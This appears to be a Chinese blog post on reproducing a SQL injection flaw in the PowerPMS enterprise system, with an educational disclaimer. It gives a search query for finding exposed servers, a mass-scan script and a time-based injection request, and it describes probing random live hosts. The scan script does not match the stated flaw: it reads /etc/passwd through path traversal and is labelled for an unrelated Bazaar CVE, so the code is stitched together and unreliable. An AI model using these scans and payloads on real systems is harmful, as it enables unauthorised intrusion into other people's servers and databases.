【漏洞复现】普华-PowerPMS APPGetUser SQL注入漏洞

声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

PowerPMS 是一款综合性的企业管理系统,它集成了财务管理、销售管理、采购管理、仓储管理以及项目管理等多个功能模块。该系统采用模块化设计,可以根据企业的具体需求进行灵活的配置和二次开发。PowerPMS 拥有用户友好的界面和流畅的操作流程,能够帮助企业高效地管理各种业务活动。此外,系统还支持多公司、多仓库、多币种等高级功能,能够满足不同规模企业的管理需求。其接口**/APPAccount/APPGetUser?name=1**存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、资产收集

1.使用网络空间测绘引擎搜索

**鹰图检索:"**PowerPMS用户登录"

2.使用poc批量扫描

python 复制代码
import urllib.request
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re

# 禁用SSL证书验证,允许不安全的请求
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    # 读取文件中的URL列表
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    # 移除URL末尾的斜杠
    url = url.rstrip("/")
    # 构造目标URL,尝试访问API文档中的敏感文件etc/passwd
    target = url+"/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
    }
    try:
        # 发送GET请求
        response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True)
        res = urllib.request.urlopen(response)
        status_code = res.getcode()
        content = res.read().decode()
        # 检查响应状态码和内容,判断是否成功读取到etc/passwd文件
        if status_code == 200 and 'root:' in content and 'var' in content:
            print(f"\033[31mDiscovered:{url}: Bazaar_CVE-2024-40348_ArbiraryFileRead!\033[0m")
            return True
    except Exception as e:
        print(e)

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        # 如果提供了单个URL,直接检查
        check(url)
    elif txt:
        # 如果提供了包含多个URL的文件,逐个检查
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        # 如果没有提供任何参数,显示帮助信息
        print("help")

cmd运行poc脚本:python poc.py -f host.txt

随机寻找的幸运儿

三、漏洞复现

1.构造数据包

1.构造数据包:

html 复制代码
GET /APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host:x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

2.数据包分析

  1. 请求行(Request Line):

    • 方法:GET
    • URI:/APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--
    • HTTP版本:HTTP/1.1
  2. 请求头(Headers):

    • Host:x.x.x.x
    • User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
    • Connection:close
  • 请求行中的方法是GET,表示这是一个获取资源的请求。
  • URI中包含了一个SQL注入攻击的尝试,其中';WAITFOR DELAY '0:0:5'--是SQL注入的一部分,用于在数据库中执行延迟操作。这种攻击可能会导致服务器响应缓慢或拒绝服务。
  • 请求头中的Host指定了目标服务器的地址。
  • User-Agent提供了客户端浏览器的信息,包括操作系统、浏览器类型和版本等。
  • Connection设置为close,表示客户端希望在收到响应后立即关闭连接。

3.结束跑路

1.构造数据包,延时5S

2.构造数据包,延时3秒

**每篇一言:**风月折断杨柳枝,琴瑟朝露挥掷成诗。

相关推荐
hazy1k17 分钟前
K230基础-录放视频
网络·人工智能·stm32·单片机·嵌入式硬件·音视频·k230
极限实验室18 分钟前
Elasticsearch 备份:snapshot 镜像使用篇
数据库·elasticsearch
AORO20251 小时前
适合户外探险、物流、应急、工业,五款三防智能手机深度解析
网络·人工智能·5g·智能手机·制造·信息与通信
武子康1 小时前
Java-145 深入浅出 MongoDB 基本操作详解:数据库查看、切换、创建集合与删除完整教程
java·数据库·sql·mysql·mongodb·性能优化·系统架构
white-persist1 小时前
XXE 注入漏洞全解析:从原理到实战
开发语言·前端·网络·安全·web安全·网络安全·信息可视化
风清再凯1 小时前
01-iptables防火墙安全
服务器·网络·安全
阿巴~阿巴~1 小时前
Centos 7/8 安装 Redis
linux·服务器·数据库·redis·centos
刘大猫.1 小时前
mysql数据库压缩
数据库·mysql·压缩·mysql数据库压缩·数据库压缩·数据库备份与压缩
oracle04062 小时前
sql练习题单-知识点总结
数据库·sql
会飞的架狗师2 小时前
【MySQL体系】第4篇:MySQL 查询优化实用技巧
数据库·mysql